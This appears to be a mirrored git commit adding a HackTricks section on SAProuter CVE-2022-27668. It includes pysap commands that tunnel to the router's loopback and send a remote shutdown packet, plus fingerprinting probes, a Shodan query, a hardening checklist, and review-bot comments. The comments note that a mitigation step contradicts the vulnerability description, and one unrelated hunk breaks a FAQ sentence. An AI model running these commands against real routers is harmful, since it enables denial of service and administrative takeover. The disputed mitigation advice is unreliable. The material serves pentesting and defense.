mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Add content from: Research Update: Enhanced src/network-services-pentesting/32...
parent
f09a9494a9
commit
6a1805a247
@ -71,15 +71,75 @@ This approach underscores the importance of secure SAProuter configurations and
For more detailed information on Metasploit modules and their usage, visit [Rapid7's database](http://www.rapid7.com/db).
---
## Recent Vulnerabilities (2022-2025)
### CVE-2022-27668 – Improper Access Control ➜ Remote Administrative Command Execution
In June 2022 SAP released Security Note **3158375** addressing a critical flaw (CVSS 9.8) in SAProuter (all kernels ≥ 7.22). An unauthenticated attacker can abuse permissive `saprouttab` entries to **send administration packets** (e.g. *shutdown*, *trace-level*, *connection-kill*) from a remote host, even when the router was started without the `-X` remote-admin option.
The issue results from the possibility to build a tunnel to the router’s own loopback interface by targeting the unspecified address **0.0.0.0**. Once the tunnel is established, the attacker gains local-host privileges and can run any admin command.
Practical exploitation can be reproduced with the **pysap** framework:
```bash
# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0 -r 3299 \
-a 127.0.0.1 -l 3299 -v
# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299
```
**Affected versions**
* Stand-alone SAProuter 7.22 / 7.53
* Kernel 7.49, 7.77, 7.81, 7.85–7.88 (incl. KRNL64NUC/UC)
**Fix / Mitigation**
1. Apply the patch delivered with SAP Note **3158375**.
2. Remove wildcard (`*`) targets from `P` and `S` lines in `saprouttab`.
3. Make sure the router is started **without** the `-X` option and is **not** directly exposed to the Internet.
---
## Updated Tooling & Tricks
* **pysap** – actively maintained and provides `router_portfw.py`, `router_admin.py` & `router_trace.py` for crafting custom NI/Router packets, fuzzing ACLs or automating the CVE-2022-27668 exploit.
* **Nmap** – extend service detection by adding the custom SAProuter probe:
```text
Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
```
Combine with NSE scripts or `--script=banner` to quickly fingerprint versions that leak the banner string (`SAProuter <ver> on '<host>'`).
* **Metasploit** – the auxiliary modules shown above still work through a SOCKS or NI proxy created with pysap, enabling full framework integration even when the router blocks direct access.
---
## Hardening & Detection Checklist
* Filter port **3299/TCP** on the perimeter firewall – allow traffic only from trusted SAP support networks.
* Keep SAProuter **fully patched**; verify with `saprouter -v` and compare against the latest kernel patch level.
* Use **strict, host-specific** entries in `saprouttab`; avoid `*` wildcards and deny `P`/`S` rules that target arbitrary hosts or ports.
* Start the service with **`-S <secudir>` + SNC** to enforce encryption and mutual authentication.
* Disable remote administration (`-X`) and, if possible, bind the listener to `127.0.0.1` while using an external reverse proxy for required traffic.
* Monitor the **dev_rout** log for suspicious `ROUTER_ADM` packets or unexpected `NI_ROUTE` requests to `0.0.0.0`.
---
## **References**
- [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
- [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
## Shodan
- `port:3299 !HTTP Network packet too big`
{{#include ../banners/hacktricks-training.md}}
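Review bot: the mitigation list contradicts the vulnerability description in this hunk. Step 3 under **Fix / Mitigation** (`Make sure the router is started **without** the `-X` option`) is offered as a fix for CVE-2022-27668, yet the paragraph above says the admin packets are accepted "even when the router was started without the `-X` remote-admin option", so running without `-X` does not mitigate this CVE; reword step 3 (and the checklist bullet `Disable remote administration (`-X`)`) as general hardening and state plainly that only the patch from SAP Note **3158375** closes the `0.0.0.0` loopback-tunnel path, since the hunk gives no evidence that the `saprouttab` cleanup in step 2 blocks a route whose target is the router itself. Second, the Nmap tip recommends `--script=banner` to fingerprint versions, but nothing on the page shows SAProuter sending the `SAProuter <ver> on '<host>'` string unprompted; `--script=banner` only reads what the server emits on connect, so either confirm that behaviour or say that the custom probe is what elicits the string. Third, the pysap invocation uses `-t 0.0.0.0 -r 3299`, `-a 127.0.0.1 -l 3299` and `router_admin.py -s` without explaining any option; a one-line comment per flag (target host/port, local bind host/port, stop-router) would let a reader check the command against the text rather than trust it.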
@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
> [!TIP]
>
> - **How can I cite a page of HackTricks?**
> - **How can I a page of HackTricks?**
As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like:
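Review bot: the only changed line in this hunk drops the verb from the FAQ question: `> - **How can I cite a page of HackTricks?**` becomes `> - **How can I a page of HackTricks?**`, which is ungrammatical and has nothing to do with the commit's stated purpose (adding SAProuter content), so restore `cite`. If the rendering shows old and new in the opposite order and `cite` is the version being added, the commit message should say that a FAQ typo is fixed alongside the content update.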
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
{{#include ../banners/hacktricks-training.md}}
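Review bot: this hunk (`@ -144,4 +144,3 @@`) only removes a trailing blank line after `{{#include ../banners/hacktricks-training.md}}` in a third, unrelated file; whitespace-only churn mixed into a content update makes the commit harder to review and to revert, so drop it or move it into a separate formatting commit.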